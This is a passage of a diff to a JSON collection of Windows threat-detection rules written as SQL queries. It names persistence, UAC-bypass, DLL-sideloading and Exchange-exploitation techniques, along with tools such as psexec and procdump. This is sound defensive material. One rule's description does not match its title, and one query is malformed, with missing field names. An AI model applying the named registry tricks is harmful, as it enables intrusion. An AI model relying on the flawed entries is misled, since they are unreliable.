OR (Image LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\HostMetadata\\\\NVMEHostmetadata.exe' ESCAPE '\\' OR Image LIKE '%\\\\Executables\\\\SSDUpdate.exe' ESCAPE '\\'))))" ], - "filename": "registry_set_sip_persistence.yml" + "filename": "raw_access_thread_disk_access_using_illegitimate_tools.yml" }, { - "title": "Internet Explorer 
Autorun Keys Modification", - "id": "a80f662f-022f-4429-9b8c-b1a41aaa6688", + "title": "DNS Server Error Failed Loading the ServerLevelPluginDLL", + "id": "cbe51394-cd93-4473-b555-edf0144952d9", "status": "test", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Internet Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Internet Explorer%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Toolbar%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer Bars%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR ((TargetObject LIKE '%\\\\Extensions\\\\{2670000A-7350-4f3c-8081-5663EE0C6C49}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{A95fe080-8f5d-11d2-a20b-00aa003c157a}%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Toolbar\\\\ShellBrowser\\\\ITBar7Layout' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\Toolbar\\\\ShowDiscussionButton' ESCAPE '\\' OR TargetObject LIKE '%\\\\Toolbar\\\\Locked' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'DNS Server' AND EventID IN ('150', '770', '771'))" ], - "filename": "registry_set_asep_reg_keys_modification_internet_explorer.yml" + "filename": "win_dns_server_susp_server_level_plugin_dll.yml" }, { - "title": "Modification of Explorer Hidden Keys", - "id": "5a5152f1-463f-436b-b2f5-8eceb3964b42", + "title": "Unsigned Binary Loaded From Suspicious Location", + "id": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", "status": "experimental", - "description": "Detects modifications to the hidden files keys in registry. This technique is abused by several malware families to hide their files from normal users.", - "author": "frack113", + "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.001" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowSuperHidden' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ImageName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageName LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\'))" ], - "filename": 
"registry_set_hide_file.yml" + "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml" }, { - "title": "Add DisallowRun Execution to Registry", - "id": "275641a5-a492-45e2-a817-7c81e9d9d3e9", + "title": "Microsoft Defender Blocked from Loading Unsigned DLL", + "id": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", "status": "experimental", - "description": "Detect set DisallowRun to 1 to prevent user running specific computer program", - "author": "frack113", + "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\DisallowRun' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ProcessPath LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR ProcessPath LIKE '%\\\\NisSrv.exe' ESCAPE '\\'))" ], - "filename": "registry_set_disallowrun_execution.yml" + "filename": "win_security_mitigations_defender_load_unsigned_dll.yml" }, { - "title": "Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting", - "id": "396ae3eb-4174-4b9b-880e-dc0364d78a19", + "title": "Standard User In High Privileged Group", + "id": "7ac407cc-0f48-4328-aede-de1d2e6fef41", "status": "experimental", - "description": "Detects the modification of Outlook setting \"LoadMacroProviderOnBoot\" which if enabled allows the automatic loading of any configured VBA project/module", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect standard users login that are part of high 
privileged groups such as the Administrator group", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.credential_access", + "attack.privilege_escalation" + ], + "falsepositives": [ + "Standard domain users who are part of the administrator group. These users shouldn't have these right. But in the case where it's necessary. They should be filtered out using the \"TargetUserName\" field" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-LSA/Operational' AND (EventID = '300' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND (SidList LIKE '%S-1-5-32-544%' ESCAPE '\\' OR SidList LIKE '%-500}%' ESCAPE '\\' OR SidList LIKE '%-518}%' ESCAPE '\\' OR SidList LIKE '%-519}%' ESCAPE '\\')) AND NOT ((TargetUserSid LIKE '%-500' ESCAPE '\\' OR TargetUserSid LIKE '%-518' ESCAPE '\\' OR TargetUserSid LIKE '%-519' ESCAPE '\\')))" + ], + "filename": "win_lsa_server_normal_user_admin.yml" + }, + { + "title": "Sysinternals Tools AppX Versions Execution", + "id": "d29a20b2-be4b-4827-81f2-3d8a59eab5fc", + "status": "experimental", + "description": "Detects execution of Sysinternals tools via an AppX package. 
Attackers could install the Sysinternals Suite to get access to tools such as psexec and procdump to avoid detection based on System paths", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the applications from the Windows Store" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\LoadMacroProviderOnBoot' ESCAPE '\\' AND Details LIKE '%0x00000001%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppModel-Runtime/Admin' AND EventID = '201' AND ImageName IN ('procdump.exe', 'psloglist.exe', 'psexec.exe', 'livekd.exe', 'ADExplorer.exe'))" ], - "filename": "registry_set_office_outlook_enable_load_macro_provider_on_boot.yml" + "filename": "win_appmodel_runtime_sysinternals_tools_appx_execution.yml" }, { - "title": "COM Hijack via Sdclt", - "id": "07743f65-7ec9-404a-a519-913db7118a8d", + "title": "Suspicious Rejected SMB Guest Logon From IP", + "id": "71886b70-d7b4-4dbf-acce-87d2ca135262", "status": "test", - "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", - "author": "Omkar Gudhate", + "description": "Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service", + "author": "Florian Roth (Nextron Systems), KevTheHermit, fuzzyf10w", "tags": [ - "attack.privilege_escalation", - "attack.t1546", - "attack.t1548" + "attack.credential_access", + "attack.t1110.001" ], "falsepositives": [ - "Unknown" + "Account fallback reasons (after failed login with specific account)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND TargetObject LIKE 
'HKCU\\\\Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-SmbClient/Security' AND EventID = '31017' AND UserName = '' AND ServerName LIKE '\\\\1%' ESCAPE '\\')" ], - "filename": "registry_set_comhijack_sdclt.yml" + "filename": "win_smbclient_security_susp_failed_guest_logon.yml" }, { - "title": "New Application in AppCompat", - "id": "60936b49-fca0-4f32-993d-7415edcf9a5d", - "status": "test", - "description": "A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Potential CVE-2023-23397 Exploitation Attempt - SMB", + "id": "de96b824-02b0-4241-9356-7e9b47f04bac", + "status": "experimental", + "description": "Detects (failed) outbound connection attempts to internet facing SMB servers. This could be a sign of potential exploitation attempts of CVE-2023-23397.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.exfiltration", + "cve.2023.23397" ], "falsepositives": [ - "This rule is to explore new applications on an endpoint. False positives depends on the organization.", - "Newly setup system.", - "Legitimate installation of new application." + "Some false positives may occur from external trusted servers. 
Apply additional filters accordingly" ], - "level": "informational", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND TargetObject LIKE '%\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('30803', '30804', '30806') AND NOT (((ServerAddress LIKE '10.%' ESCAPE '\\' OR ServerAddress LIKE '192.168.%' ESCAPE '\\' OR ServerAddress LIKE '172.16.%' ESCAPE '\\' OR ServerAddress LIKE '172.17.%' ESCAPE '\\' OR ServerAddress LIKE '172.18.%' ESCAPE '\\' OR ServerAddress LIKE '172.19.%' ESCAPE '\\' OR ServerAddress LIKE '172.20.%' ESCAPE '\\' OR ServerAddress LIKE '172.21.%' ESCAPE '\\' OR ServerAddress LIKE '172.22.%' ESCAPE '\\' OR ServerAddress LIKE '172.23.%' ESCAPE '\\' OR ServerAddress LIKE '172.24.%' ESCAPE '\\' OR ServerAddress LIKE '172.25.%' ESCAPE '\\' OR ServerAddress LIKE '172.26.%' ESCAPE '\\' OR ServerAddress LIKE '172.27.%' ESCAPE '\\' OR ServerAddress LIKE '172.28.%' ESCAPE '\\' OR ServerAddress LIKE '172.29.%' ESCAPE '\\' OR ServerAddress LIKE '172.30.%' ESCAPE '\\' OR ServerAddress LIKE '172.31.%' ESCAPE '\\' OR ServerAddress LIKE '127.%' ESCAPE '\\' OR ServerAddress LIKE '169.254.%' ESCAPE '\\'))))" ], - "filename": "registry_set_new_application_appcompat.yml" + "filename": "win_smbclient_connectivity_exploit_cve_2023_23397_outlook_remote_file.yml" }, { - "title": "ServiceDll Hijack", - "id": "612e47e9-8a59-43a6-b404-f48683f45bd6", - "status": "experimental", - "description": "Detects changes to the \"ServiceDLL\" value related to a service in the registry. 
This is often used as a method of persistence.", - "author": "frack113", + "title": "MSExchange Transport Agent Installation - Builtin", + "id": "4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6", + "status": "test", + "description": "Detects the Installation of a Exchange Transport Agent", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.t1505.002" ], "falsepositives": [ - "Administrative scripts", - "Installation of a service" + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Parameters\\\\ServiceDll' ESCAPE '\\') AND NOT ((Details LIKE 'C:\\\\Windows\\\\system32\\\\spool\\\\drivers\\\\x64\\\\3\\\\PrintConfig.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\Parameters\\\\ServiceDll' ESCAPE '\\' AND Details LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND logs MATCH ('\"Install-TransportAgent\"'))" ], - "filename": "registry_set_servicedll_hijack.yml" + "filename": "win_exchange_transportagent.yml" }, { - "title": "Running Chrome VPN Extensions via the Registry 2 VPN Extension", - "id": "b64a026b-8deb-4c1d-92fd-98893209dff1", + "title": "Exchange Set OabVirtualDirectory ExternalUrl Property", + "id": "9db37458-4df2-46a5-95ab-307e7f29e675", "status": "test", - "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", - "author": "frack113", + "description": "Rule to 
detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", + "author": "Jose Rodriguez @Cyb3rPandaH", "tags": [ "attack.persistence", - "attack.t1133" + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Software\\\\Wow6432Node\\\\Google\\\\Chrome\\\\Extensions%' ESCAPE '\\' AND TargetObject LIKE '%update\\_url' ESCAPE '\\' AND EventType = 'SetValue' AND (TargetObject LIKE '%fdcgdnkidjaadafnichfpabhfomcebme%' ESCAPE '\\' OR TargetObject LIKE '%fcfhplploccackoneaefokcmbjfbkenj%' ESCAPE '\\' OR TargetObject LIKE '%bihmplhobchoageeokmgbdihknkjbknd%' ESCAPE '\\' OR TargetObject LIKE '%gkojfkhlekighikafcpjkiklfbnlmeio%' ESCAPE '\\' OR TargetObject LIKE '%jajilbjjinjmgcibalaakngmkilboobh%' ESCAPE '\\' OR TargetObject LIKE '%gjknjjomckknofjidppipffbpoekiipm%' ESCAPE '\\' OR TargetObject LIKE '%nabbmpekekjknlbkgpodfndbodhijjem%' ESCAPE '\\' OR TargetObject LIKE '%kpiecbcckbofpmkkkdibbllpinceiihk%' ESCAPE '\\' OR TargetObject LIKE '%nlbejmccbhkncgokjcmghpfloaajcffj%' ESCAPE '\\' OR TargetObject LIKE '%omghfjlpggmjjaagoclmmobgdodcjboh%' ESCAPE '\\' OR TargetObject LIKE '%bibjcjfmgapbfoljiojpipaooddpkpai%' ESCAPE '\\' OR TargetObject LIKE '%mpcaainmfjjigeicjnlkdfajbioopjko%' ESCAPE '\\' OR TargetObject LIKE '%jljopmgdobloagejpohpldgkiellmfnc%' ESCAPE '\\' OR TargetObject LIKE '%lochiccbgeohimldjooaakjllnafhaid%' ESCAPE '\\' OR TargetObject LIKE '%nhnfcgpcbfclhfafjlooihdfghaeinfc%' ESCAPE '\\' OR TargetObject LIKE '%ookhnhpkphagefgdiemllfajmkdkcaim%' ESCAPE '\\' OR TargetObject LIKE '%namfblliamklmeodpcelkokjbffgmeoo%' ESCAPE '\\' OR TargetObject LIKE '%nbcojefnccbanplpoffopkoepjmhgdgh%' ESCAPE '\\' OR TargetObject LIKE '%majdfhpaihoncoakbjgbdhglocklcgno%' ESCAPE '\\' OR TargetObject LIKE '%lnfdmdhmfbimhhpaeocncdlhiodoblbd%' ESCAPE '\\' OR TargetObject LIKE 
'%eppiocemhmnlbhjplcgkofciiegomcon%' ESCAPE '\\' OR TargetObject LIKE '%cocfojppfigjeefejbpfmedgjbpchcng%' ESCAPE '\\' OR TargetObject LIKE '%foiopecknacmiihiocgdjgbjokkpkohc%' ESCAPE '\\' OR TargetObject LIKE '%hhdobjgopfphlmjbmnpglhfcgppchgje%' ESCAPE '\\' OR TargetObject LIKE '%jgbaghohigdbgbolncodkdlpenhcmcge%' ESCAPE '\\' OR TargetObject LIKE '%inligpkjkhbpifecbdjhmdpcfhnlelja%' ESCAPE '\\' OR TargetObject LIKE '%higioemojdadgdbhbbbkfbebbdlfjbip%' ESCAPE '\\' OR TargetObject LIKE '%hipncndjamdcmphkgngojegjblibadbe%' ESCAPE '\\' OR TargetObject LIKE '%iolonopooapdagdemdoaihahlfkncfgg%' ESCAPE '\\' OR TargetObject LIKE '%nhfjkakglbnnpkpldhjmpmmfefifedcj%' ESCAPE '\\' OR TargetObject LIKE '%jpgljfpmoofbmlieejglhonfofmahini%' ESCAPE '\\' OR TargetObject LIKE '%fgddmllnllkalaagkghckoinaemmogpe%' ESCAPE '\\' OR TargetObject LIKE '%ejkaocphofnobjdedneohbbiilggdlbi%' ESCAPE '\\' OR TargetObject LIKE '%keodbianoliadkoelloecbhllnpiocoi%' ESCAPE '\\' OR TargetObject LIKE '%hoapmlpnmpaehilehggglehfdlnoegck%' ESCAPE '\\' OR TargetObject LIKE '%poeojclicodamonabcabmapamjkkmnnk%' ESCAPE '\\' OR TargetObject LIKE '%dfkdflfgjdajbhocmfjolpjbebdkcjog%' ESCAPE '\\' OR TargetObject LIKE '%kcdahmgmaagjhocpipbodaokikjkampi%' ESCAPE '\\' OR TargetObject LIKE '%klnkiajpmpkkkgpgbogmcgfjhdoljacg%' ESCAPE '\\' OR TargetObject LIKE '%lneaocagcijjdpkcabeanfpdbmapcjjg%' ESCAPE '\\' OR TargetObject LIKE '%pgfpignfckbloagkfnamnolkeaecfgfh%' ESCAPE '\\' OR TargetObject LIKE '%jplnlifepflhkbkgonidnobkakhmpnmh%' ESCAPE '\\' OR TargetObject LIKE '%jliodmnojccaloajphkingdnpljdhdok%' ESCAPE '\\' OR TargetObject LIKE '%hnmpcagpplmpfojmgmnngilcnanddlhb%' ESCAPE '\\' OR TargetObject LIKE '%ffbkglfijbcbgblgflchnbphjdllaogb%' ESCAPE '\\' OR TargetObject LIKE '%kcndmbbelllkmioekdagahekgimemejo%' ESCAPE '\\' OR TargetObject LIKE '%jdgilggpfmjpbodmhndmhojklgfdlhob%' ESCAPE '\\' OR TargetObject LIKE '%bihhflimonbpcfagfadcnbbdngpopnjb%' ESCAPE '\\' OR TargetObject LIKE '%ppajinakbfocjfnijggfndbdmjggcmde%' 
ESCAPE '\\' OR TargetObject LIKE '%oofgbpoabipfcfjapgnbbjjaenockbdp%' ESCAPE '\\' OR TargetObject LIKE '%bhnhkdgoefpmekcgnccpnhjfdgicfebm%' ESCAPE '\\' OR TargetObject LIKE '%knmmpciebaoojcpjjoeonlcjacjopcpf%' ESCAPE '\\' OR TargetObject LIKE '%dhadilbmmjiooceioladdphemaliiobo%' ESCAPE '\\' OR TargetObject LIKE '%jedieiamjmoflcknjdjhpieklepfglin%' ESCAPE '\\' OR TargetObject LIKE '%mhngpdlhojliikfknhfaglpnddniijfh%' ESCAPE '\\' OR TargetObject LIKE '%omdakjcmkglenbhjadbccaookpfjihpa%' ESCAPE '\\' OR TargetObject LIKE '%npgimkapccfidfkfoklhpkgmhgfejhbj%' ESCAPE '\\' OR TargetObject LIKE '%akeehkgglkmpapdnanoochpfmeghfdln%' ESCAPE '\\' OR TargetObject LIKE '%gbmdmipapolaohpinhblmcnpmmlgfgje%' ESCAPE '\\' OR TargetObject LIKE '%aigmfoeogfnljhnofglledbhhfegannp%' ESCAPE '\\' OR TargetObject LIKE '%cgojmfochfikphincbhokimmmjenhhgk%' ESCAPE '\\' OR TargetObject LIKE '%ficajfeojakddincjafebjmfiefcmanc%' ESCAPE '\\' OR TargetObject LIKE '%ifnaibldjfdmaipaddffmgcmekjhiloa%' ESCAPE '\\' OR TargetObject LIKE '%jbnmpdkcfkochpanomnkhnafobppmccn%' ESCAPE '\\' OR TargetObject LIKE '%apcfdffemoinopelidncddjbhkiblecc%' ESCAPE '\\' OR TargetObject LIKE '%mjolnodfokkkaichkcjipfgblbfgojpa%' ESCAPE '\\' OR TargetObject LIKE '%oifjbnnafapeiknapihcmpeodaeblbkn%' ESCAPE '\\' OR TargetObject LIKE '%plpmggfglncceinmilojdkiijhmajkjh%' ESCAPE '\\' OR TargetObject LIKE '%mjnbclmflcpookeapghfhapeffmpodij%' ESCAPE '\\' OR TargetObject LIKE '%bblcccknbdbplgmdjnnikffefhdlobhp%' ESCAPE '\\' OR TargetObject LIKE '%aojlhgbkmkahabcmcpifbolnoichfeep%' ESCAPE '\\' OR TargetObject LIKE '%lcmammnjlbmlbcaniggmlejfjpjagiia%' ESCAPE '\\' OR TargetObject LIKE '%knajdeaocbpmfghhmijicidfcmdgbdpm%' ESCAPE '\\' OR TargetObject LIKE '%bdlcnpceagnkjnjlbbbcepohejbheilk%' ESCAPE '\\' OR TargetObject LIKE '%edknjdjielmpdlnllkdmaghlbpnmjmgb%' ESCAPE '\\' OR TargetObject LIKE '%eidnihaadmmancegllknfbliaijfmkgo%' ESCAPE '\\' OR TargetObject LIKE '%ckiahbcmlmkpfiijecbpflfahoimklke%' ESCAPE '\\' OR TargetObject LIKE 
'%macdlemfnignjhclfcfichcdhiomgjjb%' ESCAPE '\\' OR TargetObject LIKE '%chioafkonnhbpajpengbalkececleldf%' ESCAPE '\\' OR TargetObject LIKE '%amnoibeflfphhplmckdbiajkjaoomgnj%' ESCAPE '\\' OR TargetObject LIKE '%llbhddikeonkpbhpncnhialfbpnilcnc%' ESCAPE '\\' OR TargetObject LIKE '%pcienlhnoficegnepejpfiklggkioccm%' ESCAPE '\\' OR TargetObject LIKE '%iocnglnmfkgfedpcemdflhkchokkfeii%' ESCAPE '\\' OR TargetObject LIKE '%igahhbkcppaollcjeaaoapkijbnphfhb%' ESCAPE '\\' OR TargetObject LIKE '%njpmifchgidinihmijhcfpbdmglecdlb%' ESCAPE '\\' OR TargetObject LIKE '%ggackgngljinccllcmbgnpgpllcjepgc%' ESCAPE '\\' OR TargetObject LIKE '%kchocjcihdgkoplngjemhpplmmloanja%' ESCAPE '\\' OR TargetObject LIKE '%bnijmipndnicefcdbhgcjoognndbgkep%' ESCAPE '\\' OR TargetObject LIKE '%lklekjodgannjcccdlbicoamibgbdnmi%' ESCAPE '\\' OR TargetObject LIKE '%dbdbnchagbkhknegmhgikkleoogjcfge%' ESCAPE '\\' OR TargetObject LIKE '%egblhcjfjmbjajhjhpmnlekffgaemgfh%' ESCAPE '\\' OR TargetObject LIKE '%ehbhfpfdkmhcpaehaooegfdflljcnfec%' ESCAPE '\\' OR TargetObject LIKE '%bkkgdjpomdnfemhhkalfkogckjdkcjkg%' ESCAPE '\\' OR TargetObject LIKE '%almalgbpmcfpdaopimbdchdliminoign%' ESCAPE '\\' OR TargetObject LIKE '%akkbkhnikoeojlhiiomohpdnkhbkhieh%' ESCAPE '\\' OR TargetObject LIKE '%gbfgfbopcfokdpkdigfmoeaajfmpkbnh%' ESCAPE '\\' OR TargetObject LIKE '%bniikohfmajhdcffljgfeiklcbgffppl%' ESCAPE '\\' OR TargetObject LIKE '%lejgfmmlngaigdmmikblappdafcmkndb%' ESCAPE '\\' OR TargetObject LIKE '%ffhhkmlgedgcliajaedapkdfigdobcif%' ESCAPE '\\' OR TargetObject LIKE '%gcknhkkoolaabfmlnjonogaaifnjlfnp%' ESCAPE '\\' OR TargetObject LIKE '%pooljnboifbodgifngpppfklhifechoe%' ESCAPE '\\' OR TargetObject LIKE '%fjoaledfpmneenckfbpdfhkmimnjocfa%' ESCAPE '\\' OR TargetObject LIKE '%aakchaleigkohafkfjfjbblobjifikek%' ESCAPE '\\' OR TargetObject LIKE '%dpplabbmogkhghncfbfdeeokoefdjegm%' ESCAPE '\\' OR TargetObject LIKE '%padekgcemlokbadohgkifijomclgjgif%' ESCAPE '\\' OR TargetObject LIKE '%bfidboloedlamgdmenmlbipfnccokknp%' 
ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Set-OabVirtualDirectory' AND = 'ExternalUrl' AND LIKE 'Page\\_Load' ESCAPE '\\' AND = 'script')" ], - "filename": "registry_set_chrome_extension.yml" + "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml" }, { - "title": "Disable UAC Using Registry", - "id": "48437c39-9e5f-47fb-af95-3d663c3f2919", + "title": "Failed MSExchange Transport Agent Installation", + "id": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", "status": "experimental", - "description": "Detects when an attacker tries to disable User Account Control (UAC) by changing its registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA from 1 to 0", - "author": "frack113", + "description": "Detects a failed installation of a Exchange Transport Agent", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.persistence", + "attack.t1505.002" ], "falsepositives": [ - "Unknown" + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." 
], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLUA%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID = '6' AND Data LIKE '%Install-TransportAgent%' ESCAPE '\\')" ], - "filename": "registry_set_disable_uac_registry.yml" + "filename": "win_exchange_transportagent_failed.yml" }, { - "title": "Outlook EnableUnsafeClientMailRules Setting Enabled - Registry", - "id": "6763c6c8-bd01-4687-bc8d-4fa52cf8ba08", + "title": "Possible Exploitation of Exchange RCE CVE-2021-42321", + "id": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb", "status": "experimental", - "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321", + "author": "Florian Roth (Nextron Systems), @testanull", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.lateral_movement", + "attack.t1210" ], "falsepositives": [ - "Unknown" + "Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID IN ('6', '8') AND (Data LIKE '%Cmdlet failed. 
Cmdlet Get-App, %' ESCAPE '\\' OR Data LIKE '%Task Get-App throwing unhandled exception: System.InvalidCastException:%' ESCAPE '\\'))" ], - "filename": "registry_set_office_outlook_enable_unsafe_client_mail_rules.yml" + "filename": "win_exchange_cve_2021_42321.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - Registry", - "id": "6597be7b-ac61-4ac8-bef4-d3ec88174853", + "title": "Remove Exported Mailbox from Exchange Webserver", + "id": "09570ae5-889e-43ea-aac0-0e1221fb3d95", "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1070" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Root\\\\InventoryApplicationFile\\\\winsat.exe|%' ESCAPE '\\' AND TargetObject LIKE '%\\\\LowerCaseLongPath' ESCAPE '\\' AND Details LIKE 'c:\\\\users\\\\%' ESCAPE 